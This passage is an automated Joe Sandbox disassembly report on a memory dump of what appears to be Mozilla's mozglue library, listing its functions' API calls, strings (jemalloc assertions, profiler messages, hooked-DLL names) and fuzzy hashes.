memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C691031
LeaveCriticalSection.KERNEL32(?), ref: 6C6910D0
EnterCriticalSection.KERNEL32(?), ref: 6C69117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C691C39
EnterCriticalSection.KERNEL32(6C6DE744), ref: 6C693391
LeaveCriticalSection.KERNEL32(6C6DE744), ref: 6C6933CD
LeaveCriticalSection.KERNEL32(?), ref: 6C693431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693437

Strings

<jemalloc>, xrefs: 6C693941, 6C6939F1
: (malloc) Unsupported character in malloc options: ', xrefs: 6C693A02
MOZ_CRASH(), xrefs: 6C693950
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6937D2
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6937A8
MALLOC_OPTIONS, xrefs: 6C6935FE
Compile-time page size does not divide the runtime one., xrefs: 6C693946
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C693559, 6C69382D, 6C693848
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C693793
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6937BD

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction ID: 96dae9f6c816b0358c2a12f1448292288e71a0c622159dc55be4494e21494cd5
Opcode Fuzzy Hash: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction Fuzzy Hash: 1F539E71A057028FD704CF29C580616FBE1BF8A328F29C76DE8699B791D771E842CB85

Function 6C6B34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EE2

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6B61DD
Part of subcall function 6C6B6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6B622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4157

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6B6250
Part of subcall function 6C6B6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6B6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4896
free.MOZGLUE ref: 6C6B489F

Strings

, xrefs: 6C6B4CD2

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction ID: 58ee6da397fa28b9ce1d1355d0b4e0bc2cd33d329d9bb7f3149907bc63987aa2
Opcode Fuzzy Hash: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction Fuzzy Hash: 3CF26C74908B808FC725CF29C08469AFBF1FFCA304F118A5ED99997711DB71A896CB46

Function 6C6664C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6664DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6664F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C666505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C666518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C66671C
GetCurrentProcess.KERNEL32 ref: 6C666724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C66672F
GetCurrentProcess.KERNEL32 ref: 6C666759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C666764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C666A80
GetSystemInfo.KERNEL32(?), ref: 6C666ABE
__Init_thread_footer.LIBCMT ref: 6C666AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AF7

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C666798
detoured.dll, xrefs: 6C6664DA
nvd3d9wrap.dll, xrefs: 6C666500
user32.dll, xrefs: 6C666526
_etoured.dll, xrefs: 6C6664ED
nvdxgiwrap.dll, xrefs: 6C666513

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction ID: 7cc53657b461bba9e13a34008fa2f976f06660de6afbf4b2ef5565db851e3b8a
Opcode Fuzzy Hash: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction Fuzzy Hash: 5CF1E6709052199FDB20CF26DC887DAB7B5AF46318F144299D809E3B41D731EE85CF9A

Function 6C6BC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6BC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE472

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 07666fdb95abeea65de448be75d2845b17df2f4a7965e0ad538a7b64aa7667bc
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 5733AC71E0021A8FCB04CFA8C8806EDBBF2FF49314F288269D955BB755D731A956CB94

Function 6C67ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C67EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C67EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C681695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6816B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C681770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C681A3E

Strings

~qel, xrefs: 6C67ED13
~qel, xrefs: 6C67ED10

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qel$~qel
API String ID: 3693777188-2922831641
Opcode ID: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction ID: 8fa18b222c337912a8b1ca23478ce27298b3960ccb6cabc63e13a2ac82a5fafa
Opcode Fuzzy Hash: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction Fuzzy Hash: 13B33971E01219CFCB24CFA8C890ADDB7B2BF49304F2585A9D459AB745D730AD86CFA4

Function 6C66FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

<jemalloc>, xrefs: 6C670D62, 6C670D76, 6C670DA7
: (malloc) Error in VirtualFree(), xrefs: 6C670D67, 6C670D7B, 6C670DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction ID: e8992d00596065b3b005aafba80a9a854203beed125ea67ceae0e362e91cc08c
Opcode Fuzzy Hash: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction Fuzzy Hash: 01C20271A057418FD724CF28C590756BBE1BF85328F28CA6DE4698B7D5C732E801CBA9

Function 6C6BE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6C6BE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6BF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6C0E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6C0E54
memcpy.VCRUNTIME140(?,?,?), ref: 6C6C0EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6C6C0ED4

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: c8e1b55e4da7bfd3646139be31583bd68617d8375b9079d4d794990734b32e14
Instruction ID: 09fc73846ed4e5b5e4925d412a24fb1bb0b96869d3e965f44c9892b77a9da60c
Opcode Fuzzy Hash: c8e1b55e4da7bfd3646139be31583bd68617d8375b9079d4d794990734b32e14
Instruction Fuzzy Hash: F063AD75E0025A8FCB04CFA8C8806DDFBB2FF89304F298269D855BB755D730A946CB95

Function 6C693E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6C6B7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>il,?,?,?,6C693E7D,?,?), ref: 6C6B777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C693F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C693F5C
VerSetConditionMask.NTDLL ref: 6C693F8D
VerSetConditionMask.NTDLL ref: 6C693F99
VerSetConditionMask.NTDLL ref: 6C693FA0
VerSetConditionMask.NTDLL ref: 6C693FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C693FB4

Strings

nvd3d9wrap.dll, xrefs: 6C694466
nvinit.dll, xrefs: 6C694479
C>il, xrefs: 6C693E93

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: C>il$nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-416255230
Opcode ID: 90aaa3219a0734a8e10a1853969c769a5af7cb6c33ae41dd46dc9edeb52facce
Instruction ID: c4b7b43111936190e031cebce628acb0aecf7b3affde093ccdcb8ce31f9d9907
Opcode Fuzzy Hash: 90aaa3219a0734a8e10a1853969c769a5af7cb6c33ae41dd46dc9edeb52facce
Instruction Fuzzy Hash: 2452F531614B459FDB10DF348480ABBB7E9AF86304F04096DE5978BB82CB74F909CB68

Function 6C66FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

MOZ_CRASH(), xrefs: 6C670CA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4, 6C671A10

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 377a90b1383cd4f6e410060cebd0b236d3e52c14ea21b1dc2458dfe8be273a8a
Instruction ID: c5f8d1fd12965b830365947a9c50168999fe390861b717d07dff7eeaa7903c5c
Opcode Fuzzy Hash: 377a90b1383cd4f6e410060cebd0b236d3e52c14ea21b1dc2458dfe8be273a8a
Instruction Fuzzy Hash: 99B2FE316057418FD724CF28C5D0716BBE1BF85328F28CA6DE86A8BB95C731E840CB69

Function 6C6A5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

name, xrefs: 6C6A5E79, 6C6A5E8F
schema, xrefs: 6C6A606D
expected a Time entry, xrefs: 6C6A5CB6
data, xrefs: 6C6A6131
expected a Count entry, xrefs: 6C6A5AC3
ProfileBuffer parse error: %s, xrefs: 6C6A5AC8, 6C6A5CBB

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 76e69116b1e6e1704ffc8b5cc9e5656b803a2a136cdc7f196174341f995c3bdf
Instruction ID: 15787890fe778cc31cb661b3cbed2d527a4f8242da0139c910558a72f95608e2
Opcode Fuzzy Hash: 76e69116b1e6e1704ffc8b5cc9e5656b803a2a136cdc7f196174341f995c3bdf
Instruction Fuzzy Hash: 1F926CB1A087418FD724CF59C49079AB7E1FFC9308F14891DE59A9B751DB30E80ACB9A

Function 6C6A2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6A2ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A2EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C6A2F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A3214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A3242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A36BF

Strings

set , xrefs: 6C6A36EC
MOZ_PROFILER_SYMBOLICATE, xrefs: 6C6A378D
get , xrefs: 6C6A3205

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: 0f2f3cde56ae256f8e4f2838535945ccd874a002808d56f1c33e8a395cb1cd4e
Instruction ID: e335c5896470117f24a1d7905bca94b85fc95766e42619db47664e281dacefd1
Opcode Fuzzy Hash: 0f2f3cde56ae256f8e4f2838535945ccd874a002808d56f1c33e8a395cb1cd4e
Instruction Fuzzy Hash: 23325F706083818FD324CF64C4906AEF7E2AFCA318F54892DE59987751DB31E94ACB5B

Function 6C697E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C697ECF, 6C698335
(pre-xul), xrefs: 6C697E88
schema, xrefs: 6C6981E3, 6C698311
vml, xrefs: 6C698207
data, xrefs: 6C698280, 6C6983E1

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vml
API String ID: 3412268980-1127494330
Opcode ID: 50d35162e2be8bb4c1390a11102234f542ceebbfd6a3dbc931716a11d87444ef
Instruction ID: d705e3e16f5a66896cbab592bcc7b139a249099473c9c99f12f19ba6965382d3
Opcode Fuzzy Hash: 50d35162e2be8bb4c1390a11102234f542ceebbfd6a3dbc931716a11d87444ef
Instruction Fuzzy Hash: 95E17EB1A043418BC710CF69884065BFBE9FBC5318F154A2DE899D7790DBB0ED498B9A

Function 6C67D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D6A6
LeaveCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D712
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D7EA

Strings

<jemalloc>, xrefs: 6C67D827
: (malloc) Error initializing arena, xrefs: 6C67D82C

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
